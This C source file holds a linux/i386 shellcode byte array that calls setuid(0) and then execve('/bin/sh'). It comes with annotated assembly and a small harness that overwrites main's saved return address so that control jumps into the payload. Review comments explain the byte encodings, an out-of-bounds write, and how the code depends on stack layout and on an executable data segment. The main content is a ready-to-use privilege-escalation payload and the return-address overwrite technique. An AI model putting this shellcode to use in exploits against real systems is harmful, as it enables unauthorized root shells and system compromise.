/*
 * Author: ORK
 * email:  orkmail@katamail.com
 *
 * This is a simple linux/i386 ShellCode that executes /bin/sh after a
 * setuid(0), followed by a minimal test harness (main) that transfers
 * control to it by overwriting its own saved return address.
 *
 * NOTE(review): the whole listing is 32-bit, frame-layout and mitigation
 * dependent (see the comments on `shellcode` and on main); it is a
 * historical listing rather than portable C.
 *
 * ASM Code (byte encodings on the right; they match the array below):
 *
 *     # setuid(0);
 *     xor  %eax, %eax        # 0x31 0xc0
 *     xor  %ebx, %ebx        # 0x31 0xdb
 *     movb $0x17, %al        # 0xb0 0x17   (the original listing annotated this
 *                            #              as 0x88 0x46 0x23, which does not
 *                            #              match the bytes in the array)
 *     int  $0x80             # 0xcd 0x80
 *
 *     jmp  call              # 0xeb 0x1e   (forward +0x1e lands on "call")
 * pop:
 *     popl %esi              # 0x5e        (%esi = address of "/bin/sh")
 *
 *     # execve(foo[0], foo, 0);
 *     xor  %eax, %eax        # 0x31 0xc0
 *     movb %al, 0x7(%esi)    # 0x88 0x46 0x07   NUL-terminate "/bin/sh"
 *     movl %esi, 0x8(%esi)   # 0x89 0x76 0x08   foo[0] = "/bin/sh"
 *     movl %eax, 0xc(%esi)   # 0x89 0x46 0x0c   foo[1] = NULL
 *     movb $0xb, %al         # 0xb0 0x0b        syscall number for execve
 *     movl %esi, %ebx        # 0x89 0xf3        filename
 *     leal 0x8(%esi), %ecx   # 0x8d 0x4e 0x08   argv = foo
 *     leal 0xc(%esi), %edx   # 0x8d 0x56 0x0c   envp (points at the NULL word)
 *     int  $0x80             # 0xcd 0x80
 *
 *     # exit(0);
 *     movb $0x1, %al         # 0xb0 0x01
 *     xor  %ebx, %ebx        # 0x31 0xdb
 *     int  $0x80             # 0xcd 0x80
 * call:
 *     call pop               # 0xe8 0xdd 0xff 0xff 0xff   (rel32 = -0x23, back to "pop")
 *     .string "/bin/sh"
 */

/*
 * Raw bytes of the listing above: 52 bytes (45 bytes of code + the 7
 * characters of "/bin/sh"); the compiler appends a 53rd byte, the string
 * terminator.
 *
 * NOTE(review): with %esi at offset 45, the stores to 0x8(%esi) and
 * 0xc(%esi) land at offsets 53..60 of this object, i.e. past its end, so
 * the foo[]/envp scratch area overwrites whatever the linker placed after
 * `shellcode` (an out-of-bounds write, undefined behavior in C terms). The
 * 0x7(%esi) store hits index 52, the terminator, and stays in bounds.
 */
char shellcode[] =
    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1e\x5e\x31\xc0\x88\x46\x07"
    "\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
    "\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xdd\xff\xff\xff\x2f\x62\x69"
    "\x6e\x2f\x73\x68";

/*
 * Test harness: makes main return into `shellcode` instead of its caller.
 *
 * `ret = (int *)&ret + 2` assumes a 32-bit frame in which the saved return
 * address sits exactly two ints above the local `ret` (presumably the
 * classic i386 layout: local, saved %ebp, return address -- confirm against
 * the compiler's actual frame). Moving a pointer outside the object it
 * points to is undefined behavior, and `(int)shellcode` is an
 * implementation-defined pointer-to-int conversion that truncates on an
 * LP64 build, where the +2 offset also no longer reaches the saved return
 * address. Any change to the locals, optimization level, frame-pointer
 * setting or stack protector alters the layout, which is why this body is
 * kept verbatim. Control transfer additionally requires the data segment
 * holding `shellcode` to be mapped executable; a W^X / non-executable-data
 * policy faults instead.
 *
 * `main()` with no return type relies on implicit int, which C99 removed.
 */
main()
{
    int *ret;

    ret = (int *)&ret + 2;
    (*ret) = (int)shellcode;
}